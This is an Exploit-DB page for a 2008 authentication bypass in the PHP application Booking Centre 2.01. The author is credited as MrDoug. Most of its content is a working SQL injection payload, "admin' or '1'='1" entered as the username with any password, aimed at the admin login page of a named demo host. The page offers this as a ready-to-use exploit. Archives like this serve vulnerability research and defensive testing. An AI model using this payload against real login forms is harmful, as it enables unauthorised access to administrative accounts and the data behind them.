Booking Centre 2.01 - Authentication Bypass

EDB-ID:

7263


Author:

MrDoug

Type:

webapps


Platform:

PHP

Date:

2008-11-28


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

Booking Centre 2.01 (Auth Bypass) SQL Injection Vulnerability

--------------------------------------------------------------

Author: MrDoug
E-mail: mrdoug13[at]gmail[dot]com

--------------------------------------------------------------

Exploit: http://demo.hotelsadmin.com/admin/index.php

Username == admin' or '1'='1
password == (whatever)

--------------------------------------------------------------

Greetz to Slappywag

--------------------------------------------------------------

# milw0rm.com [2008-11-28]